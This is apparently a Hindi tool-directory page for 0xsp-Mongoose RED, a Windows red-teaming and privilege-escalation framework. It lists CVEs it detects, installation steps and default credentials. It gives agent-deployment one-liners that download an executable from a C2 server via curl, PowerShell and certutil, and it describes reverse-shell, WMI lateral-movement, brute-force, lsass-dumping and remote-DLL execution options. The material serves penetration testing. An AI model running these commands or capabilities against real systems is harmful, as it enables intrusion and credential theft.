Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
0xsp-Mongoose — साइबर सुरक्षा सिमुलेशन और रेड टीमिंग संचालन के लिए एक अनूठा ढांचा, नई कमजोरियों, गलत कॉन्फ़िगरेशन और विशेषाधिकार वृद्धि हमलों के लिए विंडोज ऑडिटिंग, एक नेटवर्क में एक उन्नत प्रतिद्वंद्वी की रणनीति और तकनीकों का अनुकरण करें। | Kitploit
उपकरण/GitHubGitHub/zux0x3a/0xsp-mongoose
विशेषाधिकार वृद्धिभेद्यता स्कैनरनेटवर्क मैपिंगपासवर्ड हमलेशोषणपार्श्व आंदोलनवेब एप्लिकेशन शोषणपोस्ट-शोषणकमांड एंड कंट्रोलरेड टीमिंगDNS विश्लेषणArchived
53411754 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
zux0x3a/0xsp-mongoose

0xsp-Mongoose

साइबर सुरक्षा सिमुलेशन और रेड टीमिंग संचालन के लिए एक अनूठा ढांचा, नई कमजोरियों, गलत कॉन्फ़िगरेशन और विशेषाधिकार वृद्धि हमलों के लिए विंडोज ऑडिटिंग, एक नेटवर्क में एक उन्नत प्रतिद्वंद्वी की रणनीति और तकनीकों का अनुकरण करें।

रिपॉजिटरी देखेंवेबसाइट

GPLv3 license

निरंतर विकास के लिए परियोजना का समर्थन करें (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)

0xsp Mongoose RED विंडोज के लिए

वर्तमान संस्करण 2.2.0

0xsp mongoose red संस्करण साइबर सुरक्षा सिमुलेशन के दौरान आपकी आवश्यकताओं की सहायता के लिए प्रदान किया गया है। इस संस्करण का उपयोग करके, आप लक्षित विंडोज ऑपरेटिंग सिस्टम का सिस्टम कमजोरियों, गलत कॉन्फ़िगरेशन और विशेषाधिकार वृद्धि हमलों के लिए ऑडिट कर सकते हैं, और नेटवर्क में एक उन्नत प्रतिद्वंद्वी की रणनीति और तकनीकों की नकल कर सकते हैं।

वेब एप्लिकेशन API के लिए node js समर्थन के साथ, समय पर स्थापना और अनुकूलन अधिक आसान हो जाता है। विंडोज सेंसर एजेंट, परिणाम स्थानांतरित करने और द्विदिश तकनीक के रूप में कमांड प्राप्त करने के लिए एप्लिकेशन API के साथ संवाद करेगा।

एजेंट windows update api और exploit database definitions मॉड्यूल का उपयोग करके विंडोज एक्सप्लॉइट्स की पहचान और पता लगाने में सक्षम है। नया रिलीज़ निम्नलिखित कमजोरियों का भी पता लगाएगा।

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472
  • CVE-2021-1675

विशेषताएं

  • विंडोज विशेषाधिकार वृद्धि स्कैनिंग तकनीक।
  • NodeJS के साथ निर्मित वेब एप्लिकेशन
  • sqlite DB का समर्थन करता है
  • पार्श्व आंदोलन तकनीक। वीडियो
  • द्विदिश संचार चैनल। वीडियो
  • प्लगइन्स ऑनलाइन पैकेजिंग।
  • उन्नत एक्सप्लॉइट डिटेक्टर स्क्रिप्टिंग इंजन।
  • विंडोज अकाउंट ब्रूटफोर्स मॉड्यूल (स्थानीय / डोमेन)
  • run-as-user विंडोज API फ़ंक्शन का हथियारीकरण। वीडियो
  • स्थानीय नेटवर्क स्कैनिंग और शेयर गणना।
  • lsass मेमोरी डंपिंग तकनीक (प्लगइन)।
  • DNS C2C इंटरैक्टिव शेल मोड

स्थापना

root@kitploit:~
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

डिफ़ॉल्ट एक्सेस क्रेडेंशियल्स :

  • उपयोगकर्ता नाम : admin
  • पासवर्ड : 0xsp

DNS C2C पायथन स्क्रिप्ट

root@kitploit:~
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP

एजेंट का त्वरित परिनियोजन

root@kitploit:~
#example 1 
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2 
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3 
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

उपयोग

root@kitploit:~
-s --विंडोज सेवाओं और स्थापित ड्राइवरों को पुनर्प्राप्त करें।
-u --उपयोगकर्ताओं, समूहों, भूमिकाओं के बारे में जानकारी पुनर्प्राप्त करें।
-c --एक्सटेंशन द्वारा संवेदनशील कॉन्फ़िग फ़ाइलों के लिए कनेक्टेड ड्राइवरों की खोज करें।
-n --नेटवर्क जानकारी, नेटवर्क इंटरफ़ेस, कनेक्शन विवरण पुनर्प्राप्त करें।
-w --लिखने योग्य निर्देशिकाओं की गणना करें, एक्सेस अनुमति जांच, संशोधित अनुमतियाँ।
-i --विंडोज सिस्टम जानकारी, सत्र, सदैव उन्नत जांच की गणना करें।
-l --किसी फ़ाइल में विशिष्ट स्ट्रिंग खोजें, उदा: agent.exe -l c:\ password *.config।
-o --nodejs एप्लिकेशन का होस्ट पता निर्दिष्ट करें, आप srvhost का भी उपयोग कर सकते हैं
-p --स्थापित सॉफ्टवेयर, चल रही प्रक्रियाएँ, कार्यों की गणना करें।
-e --कर्नेल निरीक्षण उपकरण, यह विंडोज कर्नेल कमजोरियों के लिए टूल डेटाबेस में खोजने में मदद करेगा
-x --node js एप्लिकेशन के साथ अपने कनेक्शन को अधिकृत करने के लिए पासवर्ड।
-d --लक्ष्य मशीन में सीधे फ़ाइलें डाउनलोड करें।
-t --लक्ष्य मशीन से node js एप्लिकेशन में फ़ाइलें अपलोड करें।
-spooler --एकल होस्ट या होस्ट की सूची को संभावित CVE-2021-1675 के लिए स्कैन करें (जैसे -spooler -srvhost या -spooler -hosts )
-m --सभी ज्ञात स्कैन प्रकार एक साथ चलाएँ।

[!] रेड टीमिंग रणनीति अनुभाग

-r --विशिष्ट खाते के साथ रिवर्स शेल उत्पन्न करें।
-lr --WMI का उपयोग करके पार्श्व आंदोलन तकनीक (जैसे -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --नेटवर्क खोज और शेयर गणना
-dns --इंटरैक्टिव DNS C2C शेल स्थापित करें
-cmd --HTTP शेल के माध्यम से कमांड स्थानांतरित करें
-interactive --इंटरैक्टिव मोड प्रारंभ करें (जैसे: प्लगइन्स लोड करना ..आदि)
-username --विशिष्ट हमला मॉड्यूल के लिए पहचान प्रमाणीकरण।
-password --विशिष्ट हमला मॉड्यूल के लिए पहचान प्रमाणीकरण।
-host --हमला करने के लिए रिमोट होस्ट की पहचान करें।
-srvhost --node js एप्लिकेशन का rhost सेट करें।
-bf --स्थानीय उपयोगकर्ता / डोमेन उपयोगकर्ता ब्रूटफोर्स मॉड्यूल
-import --स्थानीय रूप से dll फ़ाइल आयात और निष्पादित करें
-remote --रिमोट होस्ट से dll फ़ाइल आयात और निष्पादित करें

दस्तावेज़ीकरण

https://0xsp.com/security%20dev/0xsp-mongoose-red

विस्तृत अनुसंधान साइट

https://0xsp.com

सुरक्षा सम्मेलन

  • Standoff365 - रूस (https://standoff365.com/conferences/357)

उपकरण ट्यूटोरियल

नए ट्यूटोरियल और ट्रिक्स प्रकाशित होने पर सूचित होने के लिए निम्नलिखित चैनल को सब्सक्राइब करना सुनिश्चित करें। https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg

टूल डाउनलोड करें